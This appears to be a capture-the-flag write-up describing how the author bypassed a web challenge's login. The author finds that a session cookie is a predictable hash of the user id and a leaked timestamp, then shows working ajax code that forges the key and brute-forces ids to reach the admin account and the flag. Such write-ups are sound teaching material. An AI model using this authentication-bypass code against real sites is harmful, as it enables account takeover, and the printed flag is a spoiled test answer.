In this challange you had to be able to login into the admins account.

When you open the site in html form you see 4 scripts
- jquery
- sha(-256 presumably) hasher
- some kind of cookie manager
- interactive javascript that governs the page, conveniently named challange.js

First I did was look through the html page to see what's on it.
I discovered a registration div hidden with css.
I searched this form in the challange.js and found the method you use to register an account.
It was not protected by a forced login trhough information verification or some sort.
You only send 2 times the same password and it will register you.
I went fourth and did so and got an account with a number as username
I looked further into the challange.js and found these lines of code

```
var _0x496673 = Cookies['get']('id');
else if (_0x496673 != $('#login-username')['val']()) _0x1e5323['failure']();
```

this meant that the `cookies['id']` is your username

since it saved information in the cookies I searched the file for more cookies and there were 3 cookies stored
- id
- time
- cck

now i wanted to look how you logged in
there were 4 POST methods
1 was registering
the other 2 were for login
the last one was unclear

one logged in using username and password
one logged in using cck cookie and id cookie
the unclear one only sended the id and when it was successfull it used the retrieved information to compare it to the time

`if (_0x3f2e31['time'] != _0x1cedcf) _0x1e5323['failure']();`

`_0x3f2e31` was retrieved

So now i know that if I send the same POST method with a valid id I would get the time related to that id.
I tested it on the account I created and it worked.

all the other methods are currently useless so I contineaud my search in fucntions I could exploit
All the way at the top was a hash function which is refereced only is the creation of the cck cookie
So the cck cookie is a hash made from what?
first I looked and it was made from something that you get retrieved after logging in with an account and it at least contained the id and time because of this line of code that was referenced in the login function.

```
function _0x3424b0(_0x578481) {
Cookies['set']('id', _0x578481['id']);
Cookies['set']('time', _0x578481['time']);
Cookies['set']('cck', _0x3b8338(_0x578481));
}
```

I logged in and it had also a data object inside it.
But with a second look in the hash function it only uses the time and id to create the cck
And we already have an id and time; so we have access to the cck now to.

Now one of the login methods are usefull cause you can login using the cck and id
So to summarize

We need an id to get the time and we need the time and id to get the cck
So we only need the id of the account to login.
The only question now is: "What is the id of the admin?"
no where in the task was anything referenced in numbers, because the id has to be a number judging from creating an account myself.

So the only solution to contineau was to bruteforce
So I created lines of code that would automaticly try to login using the id given and created this:

```
var id = "0";
$['ajax']({
'url': 'api/login/',
'type': 'POST',
'headers': {
'X-Cache-Command': 'META',
'X-Cache-User': id
},
'success': _0x3f2e31 => {
var _0x51fe42 = new jsSHA('SHA-256', 'TEXT');
var _0x4e3a61 = id + '\x20000\x20114328\x20000\x20' + _0x3f2e31.time;
_0x51fe42['update'](_0x4e3a61);
var _0x50f900 = _0x51fe42['getHash']('HEX');

$['ajax']({
'url': 'api/login/',
'type': 'POST',
'headers': {
'X-Cache-Command': 'PULL',
'X-Cache-User': id,
'X-Cache-Key': _0x50f900
},
'success': _0xa48257 => {
console.log(_0xa48257);
},
'error': () => {
alert('Unexpected\x20Error!');
Cookies['remove']('id');
Cookies['remove']('cck');
Cookies['remove']('time');
}
});

}
});
```

At the end of this algorithm there would be information information returned
and with `id='6'` the information returned contained the flag:
CodefestCTF{1AmTeHHHAX00Rr4uj8rfi4e$%y5yhrf}